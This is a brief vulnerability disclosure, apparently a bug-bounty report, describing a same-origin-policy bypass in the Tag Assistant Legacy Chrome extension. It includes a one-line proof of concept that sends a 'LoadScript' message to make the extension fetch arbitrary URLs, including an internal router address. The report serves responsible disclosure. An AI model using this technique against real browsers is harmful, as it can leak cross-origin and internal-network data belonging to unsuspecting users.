Summary:
SOP bypass via Tag Assistant Legacy
Product:
Google Tag Assistant
URL:
https://chrome.google.com/webstore/detail/tag-assistant-legacy-by-g/kejbdjndbnbjgmefkgdddjlbokphdefk/
Vulnerability type:
Sensitive data exposure
Details
In the context of the content script on an attacker controlled website:
chrome.runtime.sendMessage({message: 'LoadScript', url: '
https://www.google.com'}
, console.log);
Attack scenario
A compromised renderer can bypass the same origin policy.
I don't think this includes cookies however this may leak sensitive data from the user internal network.
For example chrome.runtime.sendMessage({message: 'LoadScript', url: '
http://192.168.1.1'}
, console.log); leaks the login page of my router which is not ideal.
Done as part of Grant issue 286169438